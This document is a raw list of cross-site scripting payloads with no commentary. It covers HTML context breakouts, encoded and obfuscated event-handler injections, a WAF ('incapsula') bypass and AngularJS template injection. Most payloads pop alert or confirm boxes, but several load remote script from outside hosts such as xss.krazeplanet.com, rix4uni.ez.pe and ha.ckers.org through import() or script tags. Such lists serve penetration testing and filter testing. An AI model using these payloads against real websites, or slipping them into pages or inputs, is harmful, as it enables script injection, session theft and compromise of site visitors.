JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</h1/</h2/</h3/</h4/</div/</p/</a/</font/</label/</button/</img/</ul/</ol/</li/</option/</span/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1)}//><Base/Href=//rix4uni.ez.pe-->
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1)}//><Base/Href=//rix4uni.ez.pe-->
'"<!-->)</Title/</h1/</h2/</h3/</h4/</div/</p/</a/</font/</label/</button/</img/</ul/</ol/</li/</option/</span/</Style/</Script/</textArea/</iFrame/</noScript><Img Src=OnXSS OnError=(confirm)(1)>
'"<!-->)</Title/</h1/</h2/</h3/</h4/</div/</p/</a/</font/</label/</button/</img/</ul/</ol/</li/</option/</span/</Style/</Script/</textArea/</iFrame/</noScript><Img Src=OnXSS OnError=&#x63;onfir\u006d`1`>
1'/confirm?.(1)/'
1')"AutoFocus/ContentEditable/OnFocusIn=(confirm)(1)//
001'-confirm`K`-'=1
1<!--><Svg/OnLoad=(confirm)(1)-->
'"1<!--></Title/</Textarea/</Script/></Iframe><Details/Open/OnToggle%3D(confirm)(1)-->
;1"' OnError=(confirm)(1) <!--><Img Src='
1"' OnError=(confirm)(1) <!--><Img Src='
1"-confirm`K`-"
1--></Title/</Style/</Textarea/</Iframe/><Img/Src/OnError=(confirm)(1)//
1')"--><Svg/OnLoad=(confirm)(1)<!--
;'"1<!--></Title/</Textarea/</Script/></Iframe><Details/Open/OnToggle=(confirm)(1)-->
1'-confirm`K`-'
1'"<!--></Scri%7Kt/><Scri%7Kt/>%7Krompt%6K1%6K</Scri%7Kt>
1'"<!--><Img/Src/OnError=(confirm)(1)>
1")'AutoFocus/ContentEditable/OnFocusIn=(confirm)(1)//
1'"><Img Src=OnXSS OnError=alert(1)>
001">K%3D'><Svg/OnLoad%3D(confirm)(1)>=1
1<!--><Svg/OnLoad%2B=(confirm)(1)-->
1'" AutoFocus One OnFocus=alert(1)//
001\47\42\55\55\41\76\74Img\40Src\40OnError\75confirm\140\113\140\76=1
;1">K%2B='><Svg%252FOnLoad%2B=(confirm)(1)>/
1">K='><Svg/OnLoad=(confirm)(1)>
1{{$new.constructor('(confirm)(1)')()}}
<!--></Title/</Textarea/</Script/</Iframe/><Details/Open/OnToggle=(confirm)(1)-->%5C
'"1<!--></Title/</Textarea/</Script/></Iframe><Details/Open/OnToggle=(confirm)(1)-->
001"*%2Fconfirm%0B(1)<%2FScript%2F--><Script>%2F*=1
1')"--><K%2FAutofocus%2FContentEditable%2FOnFocusIn%3D%26%2397%26%23108%26%23101%26%23114%26%23116%26%2396%26%2375%26%2396<!--
1')"AutoFocus/ContentEditable/On%0CFocusIn=(conf%0Cirm)(1)//
1'"--><Img/Src/OnError=(confirm)(1)//<!--
1</Script/><Img/Src/OnError%3Dconfirm?.(1)>
')"--><Script/Src=//xss.krazeplanet.com/10.js></Script>
')"--><img src="x" onerror="import('//xss.krazeplanet.com/10.js')">
')"--><img src="x" onload="import('//xss.krazeplanet.com/10.js')">
')"--><svg/onload=import('//xss.krazeplanet.com/10.js')>
')"--><img/onerror=import('//xss.krazeplanet.com/10.js')>
')"--><img/onload=import('//xss.krazeplanet.com/10.js')>
')"--><img src=//xss.krazeplanet.com/10.js OnLoad=import(src)>
')"--><Img Src=//xss.krazeplanet.com/1.js OnLoad%0C=import(Src)//
')"--><img src=x onerror=(alert)(1)||alert(2)||al\u0065rt(3)>
')"--><img src=x onerror=(alert)(1)&&alert(2)&&al\u0065rt(3)>
"><script/src=//rix4uni.ez.pe></script>"@x.com
"><img/src/onerror=import('//rix4uni.ez.pe')>"@x.com
013371337;ext=<img/src/onerror=import('//rix4uni.ez.pe')>
<Img Src=OnXSS OnError=&#x63;onfir\u006d`1`>
<Img Src=OnXSS OnError=confirm(1)>
'"<!-->)</Title/</h1/</h2/</h3/</h4/</div/</p/</a/</font/</label/</button/</img/</ul/</ol/</li/</option/</span/</Style/</Script/</textArea/</iFrame/</noScript><IMG SrC=x OnError=&#99;&#x6f;&#x00006e;\u0066irm(1)>
'"<!-->)</Title/</h1/</h2/</h3/</h4/</div/</p/</a/</font/</label/</button/</img/</ul/</ol/</li/</option/</span/</Style/</Script/</textArea/</iFrame/</noScript><SvG OnLoAd=&#99;&#x6f;&#x00006e;\u0066irm(1)>
'"<!-->)</Title/</h1/</h2/</h3/</h4/</div/</p/</a/</font/</label/</button/</img/</ul/</ol/</li/</option/</span/</Style/</Script/</textArea/</iFrame/</noScript><iFRame SRC=x ONLoAd=&#99;&#x6f;&#x00006e;\u0066irm(1)></iFRame>
xyztest");alert(origin);// 
xyz,test");alert(origin);// 
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
<body onload="print()">
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
<script>alert(document.domain)</script>
<img src=x onerror=alert(document.domain)>
<svg onload=alert(document.domain)>
<details open ontoggle=alert(document.domain)>
" onmouseover="alert(1)"
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
****************************************
<script>alert('1')</script>
"><script>alert('1')</script>
<svg/onload=alert('1');
<acronym><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
<bgsound><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
<xmp><p title="</#{endtag}><svg/onload=alert(#{starttag})>">
">'><details/open/ontoggle=confirm('XSS')>
incapsula bypass: <iframe/onload="var b ='document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;this['src']=a">
\'-alert(1)//
</script><svg onload=alert(1)>
<x contenteditable onblur=alert(1)>lose focus!
#getURL,javascript:alert(1)",
#goto,javascript:alert(1)",	
?javascript:alert(1)",
<img onerror="location='javascript:=lert(1)'" src="x">
<img onerror="location='javascript:%61lert(1)'" src="x">
<img onerror="location='javascript:\x2561lert(1)'" src="x">
<img onerror="location='javascript:\x255Cu0061lert(1)'" src="x" >
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<<scr\0ipt/src=http://xss.com/xss.js></script
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
' onmouseover=alert(/Black.Spook/)
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>v
<div id="1"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>//["'`-->]]>]</div><div id="2"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi//["'`-->]]>]</div><div id="3"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>//["'`-->]]>]</div><div id="4">0?<script>

